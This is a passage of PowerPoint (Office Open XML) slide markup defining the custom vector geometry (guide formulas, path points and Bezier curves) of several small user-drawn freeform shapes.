                <a:gd name="T28" fmla="*/ 2 w 32"/>
                <a:gd name="T29" fmla="*/ 9 h 34"/>
                <a:gd name="T30" fmla="*/ 2 w 32"/>
                <a:gd name="T31" fmla="*/ 17 h 34"/>
                <a:gd name="T32" fmla="*/ 10 w 32"/>
                <a:gd name="T33" fmla="*/ 17 h 34"/>
                <a:gd name="T34" fmla="*/ 10 w 32"/>
                <a:gd name="T35" fmla="*/ 9 h 34"/>
                <a:gd name="T36" fmla="*/ 2 w 32"/>
                <a:gd name="T37" fmla="*/ 28 h 34"/>
                <a:gd name="T38" fmla="*/ 10 w 32"/>
                <a:gd name="T39" fmla="*/ 28 h 34"/>
                <a:gd name="T40" fmla="*/ 10 w 32"/>
                <a:gd name="T41" fmla="*/ 20 h 34"/>
                <a:gd name="T42" fmla="*/ 2 w 32"/>
                <a:gd name="T43" fmla="*/ 20 h 34"/>
                <a:gd name="T44" fmla="*/ 2 w 32"/>
                <a:gd name="T45" fmla="*/ 28 h 34"/>
                <a:gd name="T46" fmla="*/ 14 w 32"/>
                <a:gd name="T47" fmla="*/ 13 h 34"/>
                <a:gd name="T48" fmla="*/ 19 w 32"/>
                <a:gd name="T49" fmla="*/ 0 h 34"/>
                <a:gd name="T50" fmla="*/ 22 w 32"/>
                <a:gd name="T51" fmla="*/ 1 h 34"/>
                <a:gd name="T52" fmla="*/ 20 w 32"/>
                <a:gd name="T53" fmla="*/ 6 h 34"/>
                <a:gd name="T54" fmla="*/ 32 w 32"/>
                <a:gd name="T55" fmla="*/ 6 h 34"/>
                <a:gd name="T56" fmla="*/ 31 w 32"/>
                <a:gd name="T57" fmla="*/ 29 h 34"/>
                <a:gd name="T58" fmla="*/ 25 w 32"/>
                <a:gd name="T59" fmla="*/ 34 h 34"/>
                <a:gd name="T60" fmla="*/ 19 w 32"/>
                <a:gd name="T61" fmla="*/ 34 h 34"/>
                <a:gd name="T62" fmla="*/ 18 w 32"/>
                <a:gd name="T63" fmla="*/ 31 h 34"/>
                <a:gd name="T64" fmla="*/ 18 w 32"/>
                <a:gd name="T65" fmla="*/ 31 h 34"/>
                <a:gd name="T66" fmla="*/ 25 w 32"/>
                <a:gd name="T67" fmla="*/ 31 h 34"/>
                <a:gd name="T68" fmla="*/ 28 w 32"/>
                <a:gd name="T69" fmla="*/ 28 h 34"/>
                <a:gd name="T70" fmla="*/ 29 w 32"/>
                <a:gd name="T71" fmla="*/ 8 h 34"/>
                <a:gd name="T72" fmla="*/ 19 w 32"/>
                <a:gd name="T73" fmla="*/ 8 h 34"/>
                <a:gd name="T74" fmla="*/ 16 w 32"/>
                <a:gd name="T75" fmla="*/ 14 h 34"/>
                <a:gd name="T76" fmla="*/ 14 w 32"/>
                <a:gd name="T77" fmla="*/ 13 h 34"/>
                <a:gd name="T78" fmla="*/ 17 w 32"/>
                <a:gd name="T79" fmla="*/ 15 h 34"/>
                <a:gd name="T80" fmla="*/ 19 w 32"/>
                <a:gd name="T81" fmla="*/ 14 h 34"/>
                <a:gd name="T82" fmla="*/ 25 w 32"/>
                <a:gd name="T83" fmla="*/ 22 h 34"/>
                <a:gd name="T84" fmla="*/ 23 w 32"/>
                <a:gd name="T85" fmla="*/ 24 h 34"/>
                <a:gd name="T86" fmla="*/ 17 w 32"/>
                <a:gd name="T87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" h="34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4" y="4"/>
                    <a:pt x="5" y="2"/>
                    <a:pt x="5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3"/>
                    <a:pt x="7" y="4"/>
                    <a:pt x="6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0" y="34"/>
                    <a:pt x="0" y="34"/>
                    <a:pt x="0" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="6"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10" y="9"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="9"/>
                    <a:pt x="2" y="9"/>
                    <a:pt x="2" y="9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10" y="17"/>
                    <a:pt x="10" y="17"/>
                    <a:pt x="10" y="17"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10" y="9"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2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2" y="20"/>
                    <a:pt x="2" y="20"/>
                    <a:pt x="2" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2" y="28"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="14" y="13"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="10"/>
                    <a:pt x="18" y="5"/>
                    <a:pt x="19" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="1"/>
                    <a:pt x="22" y="1"/>
                    <a:pt x="22" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="3"/>
                    <a:pt x="21" y="4"/>
                    <a:pt x="20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1" y="18"/>
                    <a:pt x="31" y="25"/>
                    <a:pt x="31" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="32"/>
                    <a:pt x="29" y="34"/>
                    <a:pt x="25" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="34"/>
                    <a:pt x="21" y="34"/>
                    <a:pt x="19" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="33"/>
                    <a:pt x="18" y="32"/>
                    <a:pt x="18" y="31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21" y="31"/>
                    <a:pt x="23" y="31"/>
                    <a:pt x="25" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="31"/>
                    <a:pt x="28" y="30"/>
                    <a:pt x="28" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="24"/>
                    <a:pt x="29" y="18"/>
                    <a:pt x="2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11"/>
                    <a:pt x="17" y="13"/>
                    <a:pt x="16" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="14"/>
                    <a:pt x="15" y="14"/>
                    <a:pt x="14" y="13"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="17" y="15"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="14"/>
                    <a:pt x="19" y="14"/>
                    <a:pt x="19" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="17"/>
                    <a:pt x="24" y="20"/>
                    <a:pt x="25" y="22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1" y="21"/>
                    <a:pt x="19" y="18"/>
                    <a:pt x="1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8" name="Freeform 24"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8292644" y="-265661"/>
              <a:ext cx="58415" cy="57636"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 10 w 35"/>
                <a:gd name="T1" fmla="*/ 0 h 34"/>
                <a:gd name="T2" fmla="*/ 10 w 35"/>
                <a:gd name="T3" fmla="*/ 1 h 34"/>
                <a:gd name="T4" fmla="*/ 16 w 35"/>
                <a:gd name="T5" fmla="*/ 9 h 34"/>
                <a:gd name="T6" fmla="*/ 14 w 35"/>
                <a:gd name="T7" fmla="*/ 11 h 34"/>
                <a:gd name="T8" fmla="*/ 9 w 35"/>
                <a:gd name="T9" fmla="*/ 3 h 34"/>
                <a:gd name="T10" fmla="*/ 2 w 35"/>
                <a:gd name="T11" fmla="*/ 15 h 34"/>
                <a:gd name="T12" fmla="*/ 0 w 35"/>
                <a:gd name="T13" fmla="*/ 12 h 34"/>
                <a:gd name="T14" fmla="*/ 8 w 35"/>
                <a:gd name="T15" fmla="*/ 0 h 34"/>
                <a:gd name="T16" fmla="*/ 10 w 35"/>
                <a:gd name="T17" fmla="*/ 0 h 34"/>
                <a:gd name="T18" fmla="*/ 3 w 35"/>
                <a:gd name="T19" fmla="*/ 24 h 34"/>
                <a:gd name="T20" fmla="*/ 5 w 35"/>
                <a:gd name="T21" fmla="*/ 22 h 34"/>
                <a:gd name="T22" fmla="*/ 8 w 35"/>
                <a:gd name="T23" fmla="*/ 26 h 34"/>
                <a:gd name="T24" fmla="*/ 12 w 35"/>
                <a:gd name="T25" fmla="*/ 18 h 34"/>
                <a:gd name="T26" fmla="*/ 2 w 35"/>
                <a:gd name="T27" fmla="*/ 18 h 34"/>
                <a:gd name="T28" fmla="*/ 2 w 35"/>
                <a:gd name="T29" fmla="*/ 16 h 34"/>
                <a:gd name="T30" fmla="*/ 15 w 35"/>
                <a:gd name="T31" fmla="*/ 16 h 34"/>
                <a:gd name="T32" fmla="*/ 15 w 35"/>
                <a:gd name="T33" fmla="*/ 18 h 34"/>
                <a:gd name="T34" fmla="*/ 10 w 35"/>
                <a:gd name="T35" fmla="*/ 28 h 34"/>
                <a:gd name="T36" fmla="*/ 13 w 35"/>
                <a:gd name="T37" fmla="*/ 32 h 34"/>
                <a:gd name="T38" fmla="*/ 10 w 35"/>
                <a:gd name="T39" fmla="*/ 33 h 34"/>
                <a:gd name="T40" fmla="*/ 3 w 35"/>
                <a:gd name="T41" fmla="*/ 24 h 34"/>
                <a:gd name="T42" fmla="*/ 7 w 35"/>
                <a:gd name="T43" fmla="*/ 9 h 34"/>
                <a:gd name="T44" fmla="*/ 9 w 35"/>
                <a:gd name="T45" fmla="*/ 8 h 34"/>
                <a:gd name="T46" fmla="*/ 12 w 35"/>
                <a:gd name="T47" fmla="*/ 13 h 34"/>
                <a:gd name="T48" fmla="*/ 9 w 35"/>
                <a:gd name="T49" fmla="*/ 15 h 34"/>
                <a:gd name="T50" fmla="*/ 7 w 35"/>
                <a:gd name="T51" fmla="*/ 9 h 34"/>
                <a:gd name="T52" fmla="*/ 24 w 35"/>
                <a:gd name="T53" fmla="*/ 12 h 34"/>
                <a:gd name="T54" fmla="*/ 27 w 35"/>
                <a:gd name="T55" fmla="*/ 12 h 34"/>
                <a:gd name="T56" fmla="*/ 27 w 35"/>
                <a:gd name="T57" fmla="*/ 17 h 34"/>
                <a:gd name="T58" fmla="*/ 26 w 35"/>
                <a:gd name="T59" fmla="*/ 24 h 34"/>
                <a:gd name="T60" fmla="*/ 35 w 35"/>
                <a:gd name="T61" fmla="*/ 32 h 34"/>
                <a:gd name="T62" fmla="*/ 33 w 35"/>
                <a:gd name="T63" fmla="*/ 34 h 34"/>
                <a:gd name="T64" fmla="*/ 25 w 35"/>
                <a:gd name="T65" fmla="*/ 26 h 34"/>
                <a:gd name="T66" fmla="*/ 24 w 35"/>
                <a:gd name="T67" fmla="*/ 27 h 34"/>
                <a:gd name="T68" fmla="*/ 16 w 35"/>
                <a:gd name="T69" fmla="*/ 34 h 34"/>
                <a:gd name="T70" fmla="*/ 14 w 35"/>
                <a:gd name="T71" fmla="*/ 32 h 34"/>
                <a:gd name="T72" fmla="*/ 22 w 35"/>
                <a:gd name="T73" fmla="*/ 26 h 34"/>
                <a:gd name="T74" fmla="*/ 24 w 35"/>
                <a:gd name="T75" fmla="*/ 17 h 34"/>
                <a:gd name="T76" fmla="*/ 24 w 35"/>
                <a:gd name="T77" fmla="*/ 12 h 34"/>
                <a:gd name="T78" fmla="*/ 17 w 35"/>
                <a:gd name="T79" fmla="*/ 8 h 34"/>
                <a:gd name="T80" fmla="*/ 23 w 35"/>
                <a:gd name="T81" fmla="*/ 8 h 34"/>
                <a:gd name="T82" fmla="*/ 24 w 35"/>
                <a:gd name="T83" fmla="*/ 3 h 34"/>
                <a:gd name="T84" fmla="*/ 15 w 35"/>
                <a:gd name="T85" fmla="*/ 3 h 34"/>
                <a:gd name="T86" fmla="*/ 15 w 35"/>
                <a:gd name="T87" fmla="*/ 1 h 34"/>
                <a:gd name="T88" fmla="*/ 35 w 35"/>
                <a:gd name="T89" fmla="*/ 1 h 34"/>
                <a:gd name="T90" fmla="*/ 35 w 35"/>
                <a:gd name="T91" fmla="*/ 3 h 34"/>
                <a:gd name="T92" fmla="*/ 27 w 35"/>
                <a:gd name="T93" fmla="*/ 3 h 34"/>
                <a:gd name="T94" fmla="*/ 26 w 35"/>
                <a:gd name="T95" fmla="*/ 8 h 34"/>
                <a:gd name="T96" fmla="*/ 34 w 35"/>
                <a:gd name="T97" fmla="*/ 8 h 34"/>
                <a:gd name="T98" fmla="*/ 34 w 35"/>
                <a:gd name="T99" fmla="*/ 25 h 34"/>
                <a:gd name="T100" fmla="*/ 31 w 35"/>
                <a:gd name="T101" fmla="*/ 25 h 34"/>
                <a:gd name="T102" fmla="*/ 31 w 35"/>
                <a:gd name="T103" fmla="*/ 11 h 34"/>
                <a:gd name="T104" fmla="*/ 19 w 35"/>
                <a:gd name="T105" fmla="*/ 11 h 34"/>
                <a:gd name="T106" fmla="*/ 19 w 35"/>
                <a:gd name="T107" fmla="*/ 25 h 34"/>
                <a:gd name="T108" fmla="*/ 17 w 35"/>
                <a:gd name="T109" fmla="*/ 25 h 34"/>
                <a:gd name="T110" fmla="*/ 17 w 35"/>
                <a:gd name="T111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" h="34">
                  <a:moveTo>
                    <a:pt x="10" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="1"/>
                    <a:pt x="10" y="1"/>
                    <a:pt x="10" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="14" y="6"/>
                    <a:pt x="16" y="9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2" y="8"/>
                    <a:pt x="11" y="5"/>
                    <a:pt x="9" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="7"/>
                    <a:pt x="5" y="11"/>
                    <a:pt x="2" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="14"/>
                    <a:pt x="1" y="13"/>
                    <a:pt x="0" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="9"/>
                    <a:pt x="6" y="5"/>
                    <a:pt x="8" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3" y="24"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="22"/>
                    <a:pt x="5" y="22"/>
                    <a:pt x="5" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="24"/>
                    <a:pt x="7" y="25"/>
                    <a:pt x="8" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="24"/>
                    <a:pt x="11" y="21"/>
                    <a:pt x="1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3" y="22"/>
                    <a:pt x="11" y="26"/>
                    <a:pt x="10" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="29"/>
                    <a:pt x="12" y="31"/>
                    <a:pt x="13" y="32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8" y="30"/>
                    <a:pt x="5" y="27"/>
                    <a:pt x="3" y="24"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="7" y="9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10"/>
                    <a:pt x="11" y="12"/>
                    <a:pt x="12" y="13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3"/>
                    <a:pt x="8" y="11"/>
                    <a:pt x="7" y="9"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="24" y="12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6" y="22"/>
                    <a:pt x="26" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="26"/>
                    <a:pt x="32" y="29"/>
                    <a:pt x="35" y="32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1" y="31"/>
                    <a:pt x="28" y="29"/>
                    <a:pt x="25" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="27"/>
                    <a:pt x="24" y="27"/>
                    <a:pt x="24" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="30"/>
                    <a:pt x="20" y="32"/>
                    <a:pt x="16" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="33"/>
                    <a:pt x="14" y="32"/>
                    <a:pt x="14" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="30"/>
                    <a:pt x="20" y="28"/>
                    <a:pt x="22" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="24"/>
                    <a:pt x="24" y="21"/>
                    <a:pt x="24" y="17"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="24" y="12"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="17" y="8"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="8"/>
                    <a:pt x="23" y="8"/>
                    <a:pt x="23" y="8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34" y="8"/>
                    <a:pt x="34" y="8"/>
                    <a:pt x="34" y="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39" name="Freeform 25"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8409473" y="-264103"/>
              <a:ext cx="58415" cy="54520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 35"/>
                <a:gd name="T1" fmla="*/ 20 h 32"/>
                <a:gd name="T2" fmla="*/ 24 w 35"/>
                <a:gd name="T3" fmla="*/ 20 h 32"/>
                <a:gd name="T4" fmla="*/ 24 w 35"/>
                <a:gd name="T5" fmla="*/ 17 h 32"/>
                <a:gd name="T6" fmla="*/ 27 w 35"/>
                <a:gd name="T7" fmla="*/ 17 h 32"/>
                <a:gd name="T8" fmla="*/ 27 w 35"/>
                <a:gd name="T9" fmla="*/ 20 h 32"/>
                <a:gd name="T10" fmla="*/ 35 w 35"/>
                <a:gd name="T11" fmla="*/ 20 h 32"/>
                <a:gd name="T12" fmla="*/ 35 w 35"/>
                <a:gd name="T13" fmla="*/ 22 h 32"/>
                <a:gd name="T14" fmla="*/ 27 w 35"/>
                <a:gd name="T15" fmla="*/ 22 h 32"/>
                <a:gd name="T16" fmla="*/ 27 w 35"/>
                <a:gd name="T17" fmla="*/ 28 h 32"/>
                <a:gd name="T18" fmla="*/ 23 w 35"/>
                <a:gd name="T19" fmla="*/ 32 h 32"/>
                <a:gd name="T20" fmla="*/ 17 w 35"/>
                <a:gd name="T21" fmla="*/ 32 h 32"/>
                <a:gd name="T22" fmla="*/ 17 w 35"/>
                <a:gd name="T23" fmla="*/ 29 h 32"/>
                <a:gd name="T24" fmla="*/ 22 w 35"/>
                <a:gd name="T25" fmla="*/ 29 h 32"/>
                <a:gd name="T26" fmla="*/ 24 w 35"/>
                <a:gd name="T27" fmla="*/ 27 h 32"/>
                <a:gd name="T28" fmla="*/ 24 w 35"/>
                <a:gd name="T29" fmla="*/ 22 h 32"/>
                <a:gd name="T30" fmla="*/ 0 w 35"/>
                <a:gd name="T31" fmla="*/ 22 h 32"/>
                <a:gd name="T32" fmla="*/ 0 w 35"/>
                <a:gd name="T33" fmla="*/ 20 h 32"/>
                <a:gd name="T34" fmla="*/ 9 w 35"/>
                <a:gd name="T35" fmla="*/ 14 h 32"/>
                <a:gd name="T36" fmla="*/ 28 w 35"/>
                <a:gd name="T37" fmla="*/ 14 h 32"/>
                <a:gd name="T38" fmla="*/ 31 w 35"/>
                <a:gd name="T39" fmla="*/ 12 h 32"/>
                <a:gd name="T40" fmla="*/ 32 w 35"/>
                <a:gd name="T41" fmla="*/ 8 h 32"/>
                <a:gd name="T42" fmla="*/ 34 w 35"/>
                <a:gd name="T43" fmla="*/ 9 h 32"/>
                <a:gd name="T44" fmla="*/ 33 w 35"/>
                <a:gd name="T45" fmla="*/ 13 h 32"/>
                <a:gd name="T46" fmla="*/ 28 w 35"/>
                <a:gd name="T47" fmla="*/ 16 h 32"/>
                <a:gd name="T48" fmla="*/ 9 w 35"/>
                <a:gd name="T49" fmla="*/ 16 h 32"/>
                <a:gd name="T50" fmla="*/ 4 w 35"/>
                <a:gd name="T51" fmla="*/ 12 h 32"/>
                <a:gd name="T52" fmla="*/ 4 w 35"/>
                <a:gd name="T53" fmla="*/ 0 h 32"/>
                <a:gd name="T54" fmla="*/ 29 w 35"/>
                <a:gd name="T55" fmla="*/ 0 h 32"/>
                <a:gd name="T56" fmla="*/ 29 w 35"/>
                <a:gd name="T57" fmla="*/ 10 h 32"/>
                <a:gd name="T58" fmla="*/ 26 w 35"/>
                <a:gd name="T59" fmla="*/ 10 h 32"/>
                <a:gd name="T60" fmla="*/ 26 w 35"/>
                <a:gd name="T61" fmla="*/ 9 h 32"/>
                <a:gd name="T62" fmla="*/ 7 w 35"/>
                <a:gd name="T63" fmla="*/ 9 h 32"/>
                <a:gd name="T64" fmla="*/ 7 w 35"/>
                <a:gd name="T65" fmla="*/ 11 h 32"/>
                <a:gd name="T66" fmla="*/ 9 w 35"/>
                <a:gd name="T67" fmla="*/ 14 h 32"/>
                <a:gd name="T68" fmla="*/ 6 w 35"/>
                <a:gd name="T69" fmla="*/ 24 h 32"/>
                <a:gd name="T70" fmla="*/ 8 w 35"/>
                <a:gd name="T71" fmla="*/ 22 h 32"/>
                <a:gd name="T72" fmla="*/ 14 w 35"/>
                <a:gd name="T73" fmla="*/ 27 h 32"/>
                <a:gd name="T74" fmla="*/ 12 w 35"/>
                <a:gd name="T75" fmla="*/ 29 h 32"/>
                <a:gd name="T76" fmla="*/ 6 w 35"/>
                <a:gd name="T77" fmla="*/ 24 h 32"/>
                <a:gd name="T78" fmla="*/ 7 w 35"/>
                <a:gd name="T79" fmla="*/ 2 h 32"/>
                <a:gd name="T80" fmla="*/ 7 w 35"/>
                <a:gd name="T81" fmla="*/ 7 h 32"/>
                <a:gd name="T82" fmla="*/ 26 w 35"/>
                <a:gd name="T83" fmla="*/ 7 h 32"/>
                <a:gd name="T84" fmla="*/ 26 w 35"/>
                <a:gd name="T85" fmla="*/ 2 h 32"/>
                <a:gd name="T86" fmla="*/ 7 w 35"/>
                <a:gd name="T87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" h="32">
                  <a:moveTo>
                    <a:pt x="0" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="20"/>
                    <a:pt x="24" y="20"/>
                    <a:pt x="24" y="20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31"/>
                    <a:pt x="26" y="32"/>
                    <a:pt x="23" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="32"/>
                    <a:pt x="20" y="32"/>
                    <a:pt x="17" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="31"/>
                    <a:pt x="17" y="30"/>
                    <a:pt x="17" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="29"/>
                    <a:pt x="20" y="29"/>
                    <a:pt x="22" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="29"/>
                    <a:pt x="24" y="29"/>
                    <a:pt x="24" y="27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0" y="22"/>
                    <a:pt x="0" y="22"/>
                    <a:pt x="0" y="22"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="20"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="9" y="14"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="14"/>
                    <a:pt x="28" y="14"/>
                    <a:pt x="28" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="14"/>
                    <a:pt x="31" y="13"/>
                    <a:pt x="31" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="11"/>
                    <a:pt x="31" y="10"/>
                    <a:pt x="32" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="8"/>
                    <a:pt x="33" y="9"/>
                    <a:pt x="34" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="11"/>
                    <a:pt x="34" y="12"/>
                    <a:pt x="33" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="15"/>
                    <a:pt x="31" y="16"/>
                    <a:pt x="28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5" y="16"/>
                    <a:pt x="4" y="15"/>
                    <a:pt x="4" y="1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4"/>
                    <a:pt x="9" y="14"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="6" y="24"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="22"/>
                    <a:pt x="8" y="22"/>
                    <a:pt x="8" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="24"/>
                    <a:pt x="13" y="26"/>
                    <a:pt x="14" y="27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27"/>
                    <a:pt x="8" y="25"/>
                    <a:pt x="6" y="24"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="7" y="2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6" y="2"/>
                    <a:pt x="26" y="2"/>
                    <a:pt x="26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0" name="Freeform 26"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8523964" y="-267218"/>
              <a:ext cx="58415" cy="59193"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 35"/>
                <a:gd name="T1" fmla="*/ 11 h 35"/>
                <a:gd name="T2" fmla="*/ 14 w 35"/>
                <a:gd name="T3" fmla="*/ 11 h 35"/>
                <a:gd name="T4" fmla="*/ 14 w 35"/>
                <a:gd name="T5" fmla="*/ 7 h 35"/>
                <a:gd name="T6" fmla="*/ 4 w 35"/>
                <a:gd name="T7" fmla="*/ 7 h 35"/>
                <a:gd name="T8" fmla="*/ 4 w 35"/>
                <a:gd name="T9" fmla="*/ 5 h 35"/>
                <a:gd name="T10" fmla="*/ 14 w 35"/>
                <a:gd name="T11" fmla="*/ 5 h 35"/>
                <a:gd name="T12" fmla="*/ 14 w 35"/>
                <a:gd name="T13" fmla="*/ 0 h 35"/>
                <a:gd name="T14" fmla="*/ 17 w 35"/>
                <a:gd name="T15" fmla="*/ 0 h 35"/>
                <a:gd name="T16" fmla="*/ 17 w 35"/>
                <a:gd name="T17" fmla="*/ 5 h 35"/>
                <a:gd name="T18" fmla="*/ 26 w 35"/>
                <a:gd name="T19" fmla="*/ 5 h 35"/>
                <a:gd name="T20" fmla="*/ 26 w 35"/>
                <a:gd name="T21" fmla="*/ 7 h 35"/>
                <a:gd name="T22" fmla="*/ 17 w 35"/>
                <a:gd name="T23" fmla="*/ 7 h 35"/>
                <a:gd name="T24" fmla="*/ 17 w 35"/>
                <a:gd name="T25" fmla="*/ 11 h 35"/>
                <a:gd name="T26" fmla="*/ 20 w 35"/>
                <a:gd name="T27" fmla="*/ 11 h 35"/>
                <a:gd name="T28" fmla="*/ 30 w 35"/>
                <a:gd name="T29" fmla="*/ 2 h 35"/>
                <a:gd name="T30" fmla="*/ 32 w 35"/>
                <a:gd name="T31" fmla="*/ 4 h 35"/>
                <a:gd name="T32" fmla="*/ 25 w 35"/>
                <a:gd name="T33" fmla="*/ 11 h 35"/>
                <a:gd name="T34" fmla="*/ 35 w 35"/>
                <a:gd name="T35" fmla="*/ 11 h 35"/>
                <a:gd name="T36" fmla="*/ 35 w 35"/>
                <a:gd name="T37" fmla="*/ 14 h 35"/>
                <a:gd name="T38" fmla="*/ 22 w 35"/>
                <a:gd name="T39" fmla="*/ 14 h 35"/>
                <a:gd name="T40" fmla="*/ 15 w 35"/>
                <a:gd name="T41" fmla="*/ 18 h 35"/>
                <a:gd name="T42" fmla="*/ 29 w 35"/>
                <a:gd name="T43" fmla="*/ 18 h 35"/>
                <a:gd name="T44" fmla="*/ 29 w 35"/>
                <a:gd name="T45" fmla="*/ 35 h 35"/>
                <a:gd name="T46" fmla="*/ 26 w 35"/>
                <a:gd name="T47" fmla="*/ 35 h 35"/>
                <a:gd name="T48" fmla="*/ 26 w 35"/>
                <a:gd name="T49" fmla="*/ 33 h 35"/>
                <a:gd name="T50" fmla="*/ 10 w 35"/>
                <a:gd name="T51" fmla="*/ 33 h 35"/>
                <a:gd name="T52" fmla="*/ 10 w 35"/>
                <a:gd name="T53" fmla="*/ 35 h 35"/>
                <a:gd name="T54" fmla="*/ 7 w 35"/>
                <a:gd name="T55" fmla="*/ 35 h 35"/>
                <a:gd name="T56" fmla="*/ 7 w 35"/>
                <a:gd name="T57" fmla="*/ 22 h 35"/>
                <a:gd name="T58" fmla="*/ 1 w 35"/>
                <a:gd name="T59" fmla="*/ 24 h 35"/>
                <a:gd name="T60" fmla="*/ 0 w 35"/>
                <a:gd name="T61" fmla="*/ 21 h 35"/>
                <a:gd name="T62" fmla="*/ 17 w 35"/>
                <a:gd name="T63" fmla="*/ 14 h 35"/>
                <a:gd name="T64" fmla="*/ 1 w 35"/>
                <a:gd name="T65" fmla="*/ 14 h 35"/>
                <a:gd name="T66" fmla="*/ 1 w 35"/>
                <a:gd name="T67" fmla="*/ 11 h 35"/>
                <a:gd name="T68" fmla="*/ 10 w 35"/>
                <a:gd name="T69" fmla="*/ 20 h 35"/>
                <a:gd name="T70" fmla="*/ 10 w 35"/>
                <a:gd name="T71" fmla="*/ 24 h 35"/>
                <a:gd name="T72" fmla="*/ 26 w 35"/>
                <a:gd name="T73" fmla="*/ 24 h 35"/>
